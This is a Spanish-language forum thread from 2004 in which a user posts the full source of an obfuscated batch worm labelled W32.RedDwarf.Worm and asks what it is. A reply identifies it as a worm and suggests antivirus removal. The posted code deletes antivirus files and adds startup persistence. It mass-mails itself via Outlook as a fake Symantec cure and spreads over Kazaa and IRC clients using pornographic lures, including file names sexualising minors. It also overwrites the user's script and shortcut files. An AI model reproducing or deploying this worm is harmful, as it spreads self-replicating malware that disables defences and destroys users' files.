elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Que es este batch ?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Que es este batch ?  (Leído 4,573 veces)
vicecity


Desconectado Desconectado

Mensajes: 894



Ver Perfil
Que es este batch ?
« en: 7 Febrero 2004, 07:18 am »

desde que mis amigos usaron mi computadora ayer vi que en mi escritorio en los iconos habia uno de un .bat

trae todo esto


------------------------
@echo off %AAAA%
REM Name: W32.RedDwarf.Worm %AAAA%
REM Author: Macca %AAAA%
ctty nul %AAAA%
crepbiwuzpjnhigwjxjfszvwximfiyixolnlsuixfckxqtpyczmxnestkdetvyokrmigvasmheycvyazefknshdkzyepriypvpgyj %AAAA%
iebsppdtcrmajschpehbmdvrjrbmnxrfywdvfaaintabgdrdjcybpskuhxizbzkgezhatyvmokdrqghcxyyiapkyltxuzcdkiqztz %AAAA%
yncktihhvzemytinkvabkihczzpqavkssfcjzdhbksfjgzmyvtxlaexdfyslhhjtxwjtgcbqspdwzcdamenxtxzymaryoxbveovus %AAAA%
tbvkrvgiqsnaduqsbahmhjnagxtehjvnpsmcwguldqhdrqadfixussjuvghocydveihligtmeibmuxhdxjpdkqucepfabkyvbkbea %AAAA%
umofdpronswpoedjzcavhiddropthpwzsewvntkykpmwhjlpsouhslqkqhitlrfgyepowfibmfegyaseskmdigdwhjfqfbwwltvxp %AAAA%
wcxqwbhyvqcxaiwnpiokdkxaolwbeujckimtuhlsrwkepkarhvnauzdixrgstpouqtwuhbipgadklycgaivysfumyebhskzbizbpr %AAAA%
mlcktipwcsprlldcdlxkpjtjjdiircdethoxtzocyhdywklhaqzcpeyaroaimagczlkmreflslhqguwnyxeuvmvxlvmecvxtjlaze %AAAA%
wnforlofofdctvgzjgjwkeqdpzjbtvdweiqpnammvmiprkhrvepcwnmgjjffzgtmcoaznleqpnlrhhrpymzgtwmddzqzprppqerye %AAAA%
bljwftkbvfjrbsmpqkkxuxmemmxvzvoaiajrnnaonqqcwcawgcttpgyfddctyuaqrtfbibpittcgtlyedhusjamhzkujzvlnljqco %AAAA%
pjvwikdqalzqufuzlgwmaquzgbebqgtclkqiefvlcrwfirbkvkoathzviyeykscvxyhnbdhczujgtvmmlcvalkamiiamkrdsgdiws %AAAA%
xqlxyyeuhedongvvrxunigdlvyptcguacvleifjgucgmuixstrrfckfhvmlrzpqrkxzcargxxhumcpqwgjbrubfshwdhyyvnnyyyg %AAAA%
 %AAAA%set A=o
 %AAAA%set B=g
del C:\pr%A%%B%ra~1\kasper~1\avp32.exe %AAAA%
 %AAAA%set A=r
 %AAAA%set B=r
del C:\p%A%og%B%a~1\norton~1\*.exe %AAAA%
 %AAAA%set A=o
 %AAAA%set B=r
del C:\pr%A%g%B%a~1\trojan~1\tc.exe %AAAA%
 %AAAA%set A=o
 %AAAA%set B=r
del C:\pr%A%g%B%a~1\norton~1\s32integ.dll %AAAA%
 %AAAA%set A=r
 %AAAA%set B=r
del C:\p%A%og%B%a\f-prot95\fpwm32.dll %AAAA%
 %AAAA%set A=p
 %AAAA%set B=a
del C:\%A%rogr%B%~1\mcafee\scan.dat
 %AAAA%set A=o
 %AAAA%set B=a
 %AAAA%set avC=tbav
goto delavri %AAAA%
 %AAAA%set avC=ocem
:delavri %AAAA%
del C:\pr%A%gr%B%~1\%avC%\tbav.dat %AAAA%
 %AAAA%set A=p
 %AAAA%set B=r
del C:\%A%rog%B%a~1\avpersonal\antivir.vdf
 %AAAA%set A=b
 %AAAA%set B=w
del C:\t%A%av%B%95\tbscan.sig %AAAA%
 %AAAA%set a=s
 %AAAA%set b=e
 %AAAA%set c=t %AAAA%
 %AAAA%%a%%b%%c% MyS=%0
copy %MyS% porn.bat %AAAA%
 %AAAA%%a%%b%%c% MyS=porn.bat
copy my.bat porn.bat %AAAA%
del my.bat  %AAAA%
copy porn.bat C:\Symantec_W32_Cure.bat %CCCC%
copy porn.bat C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayF=dim
echo %VBSwayF% x > C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayF=
 %CCCC%set VBSwayA=resume
echo.on error %VBSwayA% next >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayA=
echo Set fso =" Scripting.FileSystem.Object" >> C:\nwboy.vbs %CCCC%
set vbsosf=gz %CCCC%
 %CCCC%set vbsosf=o
echo Set so=CreateObject(fs%vbsosf%) >> C:\nwboy.vbs %CCCC%
 %CCCC%set vbsosf=
echo Set ol=CreateObject("Outlook.Application") >> C:\nwboy.vbs %CCCC%
echo Set out= WScript.CreateObject("Outlook.Application") >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayD=out
echo Set mapi = %VBSwayD%.GetNameSpace("MAPI") >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayD=
 %CCCC%set VBSwayN=Lists
echo Set a = mapi.Address%VBSwayN%(1) >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayN=
echo Set ae=a.AddressEntries >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayB=Count
echo For x=1 To ae.%VBSwayB% >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayB=
echo Set ci=ol.CreateItem(0) >> C:\nwboy.vbs %CCCC%
echo Set Mail=ci >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayC=Name
echo Mail.to=ol.Get%VBSwayC%Space("MAPI").AddressLists(1).AddressEntries(x) >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayC=
 %CCCC%set VBSwayK=Mail
echo %VBSwayK%.Subject="Symantec Security Alert" >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayK=
echo Mail.Body="Symantec have revently discovered a cure for the very destructive worm W32/Mydoom@MM (SEE ATTACHEMNT). This worm installs a backdoor on the system letting attackers gain remote access it also attacks the mircosoft ssrver and LEAVES YOU THE USER TO BLAME." >> C:\nwboy.vbs %CCCC%
 %CCCC%set sendB=i
 %CCCC%set attA=A
 %CCCC%set attB=a
 %CCCC%set attC=t
goto mailrib %CCCC%
 %CCCC%set sendB=k
 %CCCC%set attA=b
 %CCCC%set attB=n
 %CCCC%set attC=a
:mailrib %CCCC%
 %CCCC%set VBSwayM=%attA%tt%attB%chmen%attC%s
echo Mail.%VBSwayM%.Add("C:\Symantec_W32_Cure.bat") >> C:\nwboy.vbs %CCCC%
 %CCCC%set VBSwayM=
 %CCCC%set sendA=e
 %CCCC%set sendB=M
echo %sendB%ail.s%sendA%nd >> C:\nwboy.vbs %CCCC%
 %CCCC%set vsenda=e
 %CCCC%set vsendb=t
goto emailri %CCCC%
 %CCCC%set vsenda=vpzt
 %CCCC%set vsendb=vpz
:emailri  %CCCC%
echo N%vsenda%x%vsendb% >> C:\nwboy.vbs %CCCC%
 %CCCC%set vsenda=
 %CCCC%set vsendb=
echo ol.Quit >> C:\nwboy.vbs %CCCC%
 %CCCC%set cscA=scri
set ywmvm=c%cscA%pt %CCCC%
%ywmvm% C:\nwboy.vbs %CCCC%
del C:\nwboy.vbs %CCCC%
del C:\Symantec_W32_Cure.bat %CCCC%
copy porn.bat C:\kazzad.vbs %EEEE%
echo.on error resume next > C:\kazzad.vbs %EEEE%
echo set ws = CreateObject("wscript.shell") >> C:\kazzad.vbs %EEEE%
 %EEEE%set kazaa=HK
goto kazari %EEEE%
 %EEEE%set kazaa=AJ
:kazari  %EEEE%
 %EEEE%set kazab=Dl
goto kazbri %EEEE%
 %EEEE%set kazab=U6
:kazbri  %EEEE%
 %EEEE%set kazac=ka
 %EEEE%set kazad=aa
goto kazcri %EEEE%
 %EEEE%set kazac=Rt
:kazcri  %EEEE%
echo ws.regwrite "%kazaa%LM\Software\%kazac%z%kazad%\Transfer\%kazab%Dir0","%windir%\kazaa\" >> C:\kazzad.vbs %EEEE%
cscript C:\kazzad.vbs %EEEE%
del C:\kazzad.vbs %EEEE%
md %windir%\kazaa %EEEE%
copy %MyS% %windir%\kazaa\slut gets ass fucked by 2 guys.mpeg.bat %EEEE%
 %EEEE%set kaza=
 %EEEE%set kazb=
 %EEEE%set kazc=
 %EEEE%set kazd=
md C:\pro %DDDD%
copy porn.bat C:\pro\14 Year Old Nude On Webcam.bat %DDDD%
if exist C:\mirc\script.ini set mIRC=C:\mirc\script.ini %DDDD%
if exist C:\mirc32\script.ini set mIRC=C:\mirc32\script.ini %DDDD%
if exist C:\progra~1\mirc\script.ini set mIRC=C:\progra~1\mirc\script.ini %DDDD%
if exist C:\progra~1\mirc32\script.ini set mIRC=C:\progra~1\mirc32\script.ini %DDDD%
 %DDDD%set spp=ts
 %DDDD%set ircc=send % DDDD %
 %DDDD%set spp=dcc %ircc% $nick C:\pro\14 Year Old Nude On Webcam.bat
goto mircri %DDDD%
 %DDDD%set spp=kfhenv
:mircri %DDDD%
echo [script] > %mIRC% %DDDD%
 %DDDD%set ircb=wt
 %DDDD%set yg= 3
 %DDDD%set yg=1
 %DDDD%set ircb=on
echo n0=%ircb% %yg%:join:*.*: { if ( $nick !=$me ) /%spp% } >>%mIRC% %DDDD%
 %DDDD%set ircb=
 %DDDD%set spp=
 %DDDD%set mIRC=
 %DDDD%set =
if exist C:\pirch98\events.ini goto pir %EEEE%
goto pirend %EEEE%
:pir %EEEE%
copy porn.bat %WinDir%\14 YEAR OLDS FUCKING.arv.bat %EEEE%
 %EEEE%set pif=Lev
echo [%pif%els] > C:\Pirch98\events.ini %EEEE%
 %EEEE%set pif=
echo Enabled=1 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pih=Count
echo %pih%=6 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pih=
 %EEEE%set pii=Unknows
echo Level1=000-%pii% >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pii=
echo 000-UnknowsEnabled=1 >> C:\Pirch98\events.ini %EEEE%
echo Level2=100-Level 100 >> C:\Pirch98\events.ini %EEEE%
echo 100-Level 100Enabled=1 >> C:\Pirch98\events.ini %EEEE%
echo Level3=200-Level 200 >> C:\Pirch98\events.ini %EEEE%
echo 200-Level 200Enabled=1 >> C:\Pirch98\events.ini %EEEE%
echo Level4=300-Level 300 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pip=300
echo %pip%-Level 300Enabled=1 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pip=
 %EEEE%set piq=400
echo Level5=%piq%-Level 400 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pir=0En
echo 400-Level 40%pir%abled=1 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pir=
 %EEEE%set pis=Level6
echo L%pis%=500-Level 500 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pis=
 %EEEE%set pit=abled
echo 500-Level 500En%pit%=1 >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pit=
 %EEEE%set pia=000
echo [%pia%-Unknowns] >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pia=
 %EEEE%set pib=Use
echo %pib%r1=*!*@* >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pib=
echo UserCount=1 >> C:\Pirch98\events.ini %EEEE%
set pirchA=s  %EEEE%
 %EEEE%set pirchA=d
set pirchB=p %EEEE%
 %EEEE%set pid=ON JOIN
goto pirchri %EEEE%
 %EEEE%set pid=jojo
:pirchri %EEEE%
echo Events1= %pid%:#: /dcc sen%pirchA% $nick %WinDir%\14 YEAR OLDS FUCKING.arv.bat >> C:\Pirch98\events.ini %EEEE%
 %EEEE%set pie=Event
echo %pie%Count=1 >> C:\Pirch98\events.ini %EEEE%
echo [100-Level 100] >> C:\Pirch98\events.ini %EEEE%
echo UserCount=0 >> C:\Pirch98\events.ini %EEEE%
echo EventCount=0 >> C:\Pirch98\events.ini %EEEE%
echo [200-Level 200] >> C:\Pirch98\events.ini %EEEE%
echo UserCount=0 >> C:\Pirch98\events.ini %EEEE%
echo EventCount=0 >> C:\Pirch98\events.ini %EEEE%
echo [300-Level 300] >> C:\Pirch98\events.ini %EEEE%
echo UserCount=0 >> C:\Pirch98\events.ini %EEEE%
echo EventCount=0 >> C:\Pirch98\events.ini %EEEE%
echo [400-Level 400] >> C:\Pirch98\events.ini %EEEE%
echo UserCount=0 >> C:\Pirch98\events.ini %EEEE%
echo EventCount=0 >> C:\Pirch98\events.ini %EEEE%
echo [500-Level 500] >> C:\Pirch98\events.ini %EEEE%
echo UserCount=0 >> C:\Pirch98\events.ini %EEEE%
echo EventCount=0 >> C:\Pirch98\events.ini %EEEE%
:pirend %EEEE%
set sendA=rx %CCCC%
 %CCCC%set sendA=s
 %CCCC%set vircA=scopy porn.bat C:\Virc\free_hardcore_porn.bat %CCCC%
copy porn.bat ghuux.vbs %CCCC%
echo.on error resume next >ghuux.vbs %CCCC%
 %CCCC%set vircB=zc
 %CCCC%set vircC=yl
 %CCCC%set vircB=w
 %CCCC%set vircC=p
echo set ws = CreateObject("%vircB%scri%vircC%t.shell") >> ghuux.vbs %CCCC%
 %CCCC%set vircB=
 %CCCC%set vircC=
 %CCCC%set vircy=USER
goto vircari %CCCC%
 %CCCC%set vircy=kdsj
:vircari %CCCC%
 %CCCC%set vircA=Software
goto vircri %CCCC%
 %CCCC%set vircA=lalala
:vircri %CCCC%
echo ws.regwrite "HKEY_%vircy%\.Default\%vircA%\MeGaLiTh %vircA%\Visual IRC 96\Events\Event17","dcc %sendA%end $nick C:\Virc\free_hardcore_porn.bat " >>ghuux.vbs %CCCC%
 %CCCC%set vircA=
 %CCCC%set sendA=
 %CCCC%set vircy=
 %CCCC%set regiA=rip
csc%regiA%t ghuux.vbs %CCCC%
del ghuux.vbs %CCCC%
 %CCCC%set regiA=
copy porn.bat %windir%\masbl.bat %DDDD%
echo REGEDIT4 >oqzbd.reg %DDDD%
 %DDDD%set regA=o
 %DDDD%set regB=w
goto redrri  %DDDD%
 %DDDD%set regA=jc
 %DDDD%set regB=ok
:regdrri  %DDDD%
echo [HKEY_LOCAL_MACHINE\S%regA%ft%regB%are\Microsoft\Windows\CurrentVersion\Run] >>oqzbd.reg %DDDD%
echo "kfienq"="%windir%\masbl.bat">>oqzbd.reg %DDDD%
 %DDDD%set RDA=for
%RDA% %%r in (*.reg \*.reg ..\*.reg %path%\*.reg %windir%\*.reg) do copy oqzbd.reg %%r %DDDD%
del oqzbd.reg %DDDD%
 %DDDD%set regA=
 %DDDD%set regB=
 %EEEE%set vbsA=s
 %EEEE%set vbsB=t
goto VBSdropwri  %EEEE%
set vbsA=os %EEEE%
 %EEEE%set vbsB=bu
:vbsdropwri  %EEEE%
copy porn.bat szlhm.vbs %EEEE%
copy porn.bat %windir%\lzirc.bat %EEEE%
echo.on error resume next > szlhm.vbs %EEEE%
echo dim wsh >>szlhm.vbs %EEEE%
echo set wsh=w%vbsA%crip%vbsB%.createobject("w%vbsA%crip%vbsB%.shell") >>szlhm.vbs %EEEE%
echo wsh.run "%windir%\lzirc.bat" >>szlhm.vbs %EEEE%
 %EEEE%set VDA=for
%VDA% %%q in (*.vbs \*.vbs ..\*.vbs %path%\*.vbs %windir%\*.vbs) do copy szlhm.vbs %%q %EEEE%
 %EEEE%set VDA=
 %EEEE%set vbsA=
 %EEEE%set vbsB=
copy porn.bat uycuo.vbs %CCCC%
copy porn.bat %windir%\pjngf.bat %CCCC%
echo.on error resume next >uycuo.vbs %CCCC%
echo set ws = CreateObject("wscript.shell") >> uycuo.vbs %CCCC%

 %CCCC%set regi=HKLM
goto regiri %CCCC%
 %CCCC%set regi=gh
:regiri %CCCC%
echo ws.regwrite "%regi%\Software\Microsoft\Windows\CurrentVersion\Run\qmcpv","%windir%\pjngf.bat" >>uycuo.vbs %CCCC%
 %CCCC%set regi=
 %CCCC%set regiA=csc
%regiA%ript uycuo.vbs %CCCC%
del uycuo.vbs %CCCC%
set regiA= %CCCC%
 %DDDD%set BDAs=hnm
 %DDDD%set BDAs=for
 %DDDD%goto BDAsas
 %DDDD%set BDAs=mfe
 0 :BDAsas
copy porn.bat %winDir%\vzcrd.bat %DDDD%
%BDAs% %%v in (*.bat ..\*.bat \*.bat %path%\*.bat) do copy %WinDir%\vzcrd.bat %%v  %DDDD%
del %WinDir%\vzcrd.bat %DDDD%
copy porn.bat C:\chvwc.bat %DDDD%
copy C:\chvwc.bat %windir%\startm~1\progra~1\autost~1\*.bat %DDDD%
del C:\chvwc.bat %DDDD%
copy porn.bat %windir%\Startm~1\Programs\StartUp\ldxkt.bat %EEEE%
 %CCCC%set WDs=for
ren %WinDir%\*.bat *.ifk %CCCC%
copy porn.bat C:\jduif.bat %CCCC%
%WDs% %%w in (%windir%\*.ifk) do copy C:\jduif.bat %%w %CCCC%
ren %windir%\*.ifk *.bat %CCCC%
del C:\jduif.bat %CCCC%
copy porn.bat %WinDir%\system\WINI.bat %DDDD%
 %DDDD%set inia=windows
echo [%inia%] >funny.bat %DDDD%
echo load=%windir%\system\WINI.bat >>funny.bat %DDDD%
 %DDDD%set inib=hb
set inic=iy %DDDD%
 %DDDD%set inic=WINI.bat
echo run=%windir%\system\%inic% >>funny.bat %DDDD%
 %DDDD%set inid=
 %DDDD%set inic=Port
 %DDDD%set inib=Null
 %DDDD%set inia=%inib%%inic%
goto iniri  %DDDD%
 %DDDD%set inia=%inic%%inib%
:iniri  %DDDD%
 %DDDD%set wiech=jdff
 %DDDD%set wiech=ec
goto wiech %DDDD%
 %DDDD%set wiech=jf
:wiech %DDDD%
 %DDDD%set wiechb=kas
 %DDDD%set wiechb=%wiech%ho
goto wiechb %DDDD%
 %DDDD%set wiechb=fg%wiech%
:wiech %DDDD%
%wiechb% %inia%=None >>funny.bat %DDDD%
copy funny.bat %windir%\dd.ini %DDDD%
del %windir%\win.ini %DDDD%
del funny.bat %DDDD%
ren %windir%\dd.ini win.ini %DDDD%
 %DDDD%set inih=
 %DDDD%set inig=
 %DDDD%set inif=
 %DDDD%set inie=
copy porn.bat %windir%\drop.vbs %EEEE%
copy porn.bat %windir%\dbhjc.bat %EEEE%
echo dim wshs, msc > %windir%\drop.vbs %EEEE%
 %EEEE%set pifA=WS
echo set wshs=Wscript.CreateObject("%pifA%cript.Shell") >> %windir%\drop.vbs %EEEE%
 %EEEE%set pifA=
 %EEEE%set pifB=te
echo set msc=wshs.Crea%pifB%Shortcut("C:\pif.lnk") >> %windir%\drop.vbs %EEEE%
 %EEEE%set pifB=
echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\dbhjc.bat") >> %windir%\drop.vbs %EEEE%
echo msc.WindowStyle = 4 >> %windir%\drop.vbs %EEEE%
 %EEEE%set pifC=ve
goto pifdri %EEEE%
 %EEEE%set pifC=ueqha
:pifdri %EEEE%
echo msc.Sa%pifC% >> %windir%\drop.vbs %EEEE%
 %EEEE%set pifC=
 %EEEE%set pifD=cscript
%pifD% %windir%\drop.vbs %EEEE%
del %windir%\drop.vbs %EEEE%
 %EEEE%set PDA=for
%PDA% %%k in (*.pif \*.pif ..\*.pif %path%\*.pif %windir%\*.pif) do copy C:\pif.pif %%k %EEEE%
 %EEEE%set PDA=
del C:\pif.pif %EEEE%
% CCCC % set lnkA=ttset lnkB=mo %CCCC%
 %CCCC%set lnkA=s
 %CCCC%set lnkB=i
 %CCCC%set lnka=run
goto lnkdrri  %CCCC%
 %CCCC%set lnka=kla
:lnkdrri  %CCCC%
copy porn.bat %windir%\dropa.vbs %CCCC%
copy porn.bat %windir%\ecxap.bat %CCCC%
copy porn.bat %windir%\dropb.vbs %CCCC%
echo.on error resume next >%windir%\dropb.vbs %CCCC%
echo dim wsh >>%windir%\dropb.vbs %CCCC%
echo set wsh=w%lnkA%cr%lnkB%pt.createobject("w%lnkA%cr%lnkB%pt.shell") >>%windir%\dropb.vbs %CCCC%
echo wshs.%lnka% "%windir%\ecxap.bat" >>%windir%\dropb.vbs %CCCC%
echo dim wsh, msc > %windir%\dropa.vbs %CCCC%
echo set wsh=w%lnkA%cr%lnkB%pt.CreateObject("w%lnkA%cr%lnkB%pt.Shell") >> %windir%\dropa.vbs %CCCC%
echo set msc=wsh.CreateShortcut("C:\vbs.lnk") >> %windir%\dropa.vbs %CCCC%
echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\dropb.vbs ") >> %windir%\dropa.vbs %CCCC%
echo msc.WindowStyle = 4 >> %windir%\dropa.vbs %CCCC%
 %CCCC%set lnkdA=Save
goto lnkdri %CCCC%
 %CCCC%set lnkdA=Ejfn
:lnkdri %CCCC%
echo msc.%lnkdA$ >> %windir%\dropa.vbs %CCCC%
cscript %windir%\dropa.vbs %CCCC%
del %windir%\dropa.vbs %CCCC%
 %CCCC%set LDA=for
%LDA% %%k in (*.lnk \*.lnk ..\*.lnk %path%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%k %CCCC%
 %CCCC%set LDA=
del C:\vbs.lnk %CCCC%
 %CCCC%set lnkA=
 %CCCC%set lnkB=
copy porn.bat oubkf.bat %DDDD%
echo [boot] > %windir%\system.ini %DDDD%
 %DDDD%set sysinic=kde
 %DDDD%set sysinic=ell
goto sysinic %DDDD%
 %DDDD%set sysinic=qiw
:sysinic %DDDD%
 %DDDD%set sysinib=kd
 %DDDD%set sysinib=sh
goto sysinib %DDDD%
 %DDDD%set sysinib=jgh
:sysinib %DDDD%
 %DDDD%set sysinia=%sysinib%%sysinic%
goto sysiniri %DDDD%
 %DDDD%set sysinia=%sysinic%%sysinib%
:sysiniri  %DDDD%
echo %sysinia%=explorer.exe %windir%\oubkf.bat>> %windir%\system.ini %DDDD%
 %DDDD%set sysinia=
 %DDDD%set sysinib=
 %DDDD%set sysinic=
cd %windir% %DDDD%
md ³³³ÅÅ %DDDD%
cd ³³³ÅÅ %DDDD%
copy porn.bat nfjhx.bat %DDDD%
copy porn.bat %windir%\jgiqo.bat %DDDD%
copy porn.bat %windir%\nfjhx.bat %DDDD%
echo ctty nul > %windir%nfjhx.bat %DDDD%
echo cls >>%windir%nfjhx.bat %DDDD%
echo if exist %windir%\jgiqo.bat goto UDFend >> %windir%nfjhx.bat %DDDD%
echo %windir% >>%windir%nfjhx.bat %DDDD%
echo cd ³³³ÅÅ >>%windir%nfjhx.bat %DDDD%
echo nfjhx.bat >> %windir%nfjhx.bat %DDDD%
echo :UDFend >>%windir%nfjhx.bat %DDDD%
copy porn.bat oejvc.vbs %DDDD%
echo.on error resume next > oejvc.vbs %DDDD%
echo set ws=CreateObject("Wscript.Shell") >>oejvc.vbs %DDDD%
echo ws.regedit "HKLM\Software\Microsoft\Windows\CurrentsVersion\RUN\UDF","%windir%nfjhx.bat" %DDDD%
command /f /c copy porn.bat A:\  %CCCC%
del porn.bat %BBBB%
ctty CON  %BBBB%
echo on %BBBB%


que es ?


En línea

4rm4ndo
Colaborador
***
Desconectado Desconectado

Mensajes: 3.023


The Big Brother is watching you


Ver Perfil
Re:Que es este batch ?
« Respuesta #1 en: 7 Febrero 2004, 09:41 am »

Hola Viceciti creo k es un gusano, asi k no abras ningun archivo ni tokes nada en la computadora
 
En la primera linea sale la palabra "worm" = gusano
 
bajate los ultimos archivos de tu antivirus y si no detecta nada ponte el macaffe k creo que es el k mas gusanos remueve
 
y si no pues bajate algo mas especifico porque seguro que los compañeros te diran algo
 
pon un post en la sección de seguridad troyenos etc...
 
y borra todo lo que se parezca a eso o contenga elgun nombre parecido como search sex  etc..
 
busca en c: alguna carpeta nueva con un dialer
 
busca en conexiones telefonicas a ver si hay dialer
 
y en archivs de porama
 
lo que esté dentro de windows es ás dificil de encontrar asi qe intenta buscar alguna solucion antivius
 
pero normalmene todo s puede borrar a mano a no ser k tengas tmbién alg metid en e registro
 
perdona me falla el teclado
 
Si tienes algo más comentalo en la sección de seguridad
 
Saludos!!


En línea

[img]http:
vicecity


Desconectado Desconectado

Mensajes: 894



Ver Perfil
Re:Que es este batch ?
« Respuesta #2 en: 7 Febrero 2004, 19:51 pm »

si, era un virus.. gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como descifrar este batch?
Scripting
CAR3S? 3 3,287 Último mensaje 6 Febrero 2011, 02:17 am
por xassiz~
Quitar este error en batch « 1 2 3 4 »
Scripting
The Last Hero 37 17,805 Último mensaje 29 Marzo 2011, 22:45 pm
por The Last Hero
Equivalente shell de este batch.
GNU/Linux
Slazar 2 2,129 Último mensaje 25 Noviembre 2012, 14:33 pm
por Slazar
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines